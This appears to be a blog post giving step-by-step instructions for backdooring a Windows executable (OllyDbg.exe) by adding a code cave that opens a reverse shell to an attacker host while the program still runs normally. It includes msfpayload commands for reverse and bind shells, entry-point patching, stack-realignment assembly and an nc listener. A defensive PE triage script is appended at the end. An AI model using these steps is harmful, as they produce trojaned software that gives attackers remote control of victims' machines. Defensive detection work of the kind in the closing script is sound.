Wednesday, August 1, 2018

Backdooring Windows Apps

Here are summarized notes on how to get a working backdoor into a PE (Portable Executable) file on Windows 7. For this case, I backdoored OllyDbg.exe. The idea is to have seamless execution of OllyDbg while spawning a reverse shell on port 1978 to an attacker host.

This uses a standard MSF payload and encoder from BT5 and hijacks the execution flow into our code cave; there is no AV bypass or stub encoder. Standard utilities are used: LordPE to add a section header and WVI32 to insert the null bytes:

1. Use LordPE to create a new section and make it executable.

2. Use WVI32 to insert null bytes of the same length as the new section.

3. Launch Immunity Debugger and open OllyDbg.exe, then take note of the module's entry point (the insertion point):

Original state:

00401000 >   EB 10          JMP SHORT OLLYDBG.00401012
00401002     66:623A        BOUND DI,DWORD PTR DS:[EDX]



4. In the "Memory" map window, look for the section ".Newsec"; it contains the null-filled memory of the code cave:

code cave: 00553000

5. Replace the entry-point instruction "JMP SHORT OLLYDBG.00401012" with a jump to the code cave address:

JMP 00553000

Now step into the code cave with F7:

5a. Inside the code cave, enter the register-saving instructions:

pushad
pushfd
<BT5 msfpayload here>
...



6. Use msfpayload on BackTrack to generate the shellcode, then select/highlight enough space in the code cave to binary-paste the payload:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.162 LPORT=1978 R > shell; hexdump -C shell | grep -v 0000013a |cut -d" " -f3-19|tr -d "(\n|'')"

Here's one for a bind shell:

msfpayload windows/shell_bind_tcp LPORT=1978 R > shell; hexdump -C shell | grep -v 00000155 |cut -d" " -f3-19|tr -d "(\n|'')"


6a. Take note of the ESP register value at the start of the code cave, at the address of the CLD instruction.

7. IMPORTANT: step to the end of the code cave and change any "call ebx" or "push ebx" statement to NOPs. This ensures that the payload doesn't exit the process and that execution flow continues.

7a. Take note of the ESP value at the last address of the code cave, then align the stack. For example:

For a reverse shell payload, the ESP values at start and end are:
start esp: 0012FF68
end esp: 0012FD6C
Diff: 0012FF68 - 0012FD6C = 1FC

For a bind shell payload:
Diff: 0012FF68 - 0012FD70 = 1F8

7b. Realign ESP and restore the saved registers (EDX included) by appending these statements at the end of the code cave:

add esp,1f8
popfd
popad
JMP 00401012
DB 66
DB 62
DB 3A

7c. Binary save to file. Reopen it with Immunity and re-examine it.

8. Make sure an nc listener is active (nc -nlvp 1978). If the backdoored PE only starts after the nc listener ends, step through the payload with F7 until you reach the end of execution or the WaitForSingleObject call. Keep hitting F7 until you see WaitForSingleObject; this is a very long process, so be patient. Otherwise:

8a. If WaitForSingleObject is reached inside a system DLL (ntdll etc.), search the shellcode for DEC ESI, PUSH ESI, INC ESI and NOP the DEC ESI and INC ESI. These instructions build the argument that is passed to WaitForSingleObject():

00553111 DEC ESI    <-----NOP this!!
00553112 PUSH ESI
00553112 INC ESI  <-------NOP this!!

8b. Save the changes (XOR'ed payload) to a new executable.

8c. Remove the offending code with NOPs or adjust it, save it to another file and rerun.

9. Rerun the executable: a reverse shell should appear and OllyDbg should start!
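From the defender's side, the steps above leave recognisable traces in the file: an extra executable (here also writable) section appended after the original ones, and a JMP at the entry point whose target lies outside the entry point's own section. The following triage script is an added example, not code from the original post; it parses the PE headers with nothing but struct and runs over two constructed images that model the walkthrough (image base 0x400000 is assumed, and the section flags and sizes are chosen for the demo):

```python
import struct

SEC_FMT = "<8sIIIIIIHHI"                       # IMAGE_SECTION_HEADER, 40 bytes
MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000

def parse_pe(data):
    """Return (entry_rva, [(name, rva, vsize, raw_offset, characteristics), ...])."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]                     # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = (struct.unpack_from("<H", data, pe + o)[0] for o in (6, 20))
    entry = struct.unpack_from("<I", data, pe + 40)[0]               # AddressOfEntryPoint
    secs = [struct.unpack_from(SEC_FMT, data, pe + 24 + opt_size + 40 * i) for i in range(nsec)]
    return entry, [(f[0].rstrip(b"\0").decode("ascii", "replace"), f[2], f[1], f[4], f[9]) for f in secs]
def section_of(secs, rva):
    return next((s for s in secs if s[1] <= rva < s[1] + s[2]), None)
def triage(data):
    """Flag the header and entry-point traits left by the section-plus-code-cave method."""
    entry, secs = parse_pe(data)
    findings = []
    for i, (name, rva, vsize, raw, ch) in enumerate(secs):
        if ch & MEM_EXECUTE and ch & MEM_WRITE:
            findings.append(f"{name}: writable and executable")
        if ch & MEM_EXECUTE and i == len(secs) - 1 and i > 0:
            findings.append(f"{name}: executable section appended last")
    home = section_of(secs, entry)
    code = data[home[3] + entry - home[1]:][:5] if home else b""
    if len(code) == 5 and code[0] == 0xE9:                           # JMP rel32 at the entry point
        target = (entry + 5 + struct.unpack("<i", code[1:])[0]) & 0xFFFFFFFF
        dest = section_of(secs, target)
        if dest is not home:
            findings.append(f"entry-point JMP leaves {home[0]} for "
                            f"{dest[0] if dest else 'unmapped'} at rva 0x{target:x}")
    return findings

def build_pe(entry, sections):
    """Constructed PE32 image (headers plus raw section bytes), for this demo only."""
    off, hdrs, raw = 0x40 + 4 + 20 + 224 + 40 * len(sections), b"", b""
    for name, rva, ch, body in sections:                             # vsize fixed at 0x1000
        hdrs += struct.pack(SEC_FMT, name.encode(), 0x1000, rva, len(body), off, 0, 0, 0, 0, ch)
        raw, off = raw + body, off + len(body)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H14xI", 0x10B, entry).ljust(224, b"\0")     # PE32 magic, entry at +16
    return dos + b"PE\0\0" + coff + opt + hdrs + raw
# Constructed samples (image base 0x400000): the original "EB 10 66 62 3A" at 00401000, and the
# same entry patched to JMP 00553000 (rva 0x153000) with an appended RWX ".Newsec" code cave.
JMP_CAVE = b"\xE9" + struct.pack("<i", 0x153000 - 0x1005) + bytes(11)
CLEAN = build_pe(0x1000, [(".text", 0x1000, 0x60000020, b"\xEB\x10\x66\x62\x3A" + bytes(11))])
CAVED = build_pe(0x1000, [(".text", 0x1000, 0x60000020, JMP_CAVE), (".Newsec", 0x153000, 0xE0000020, bytes(16))])
```

Running it on a real file is a matter of calling triage(open(path, "rb").read()); CLEAN and CAVED exist only to show both outcomes offline.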
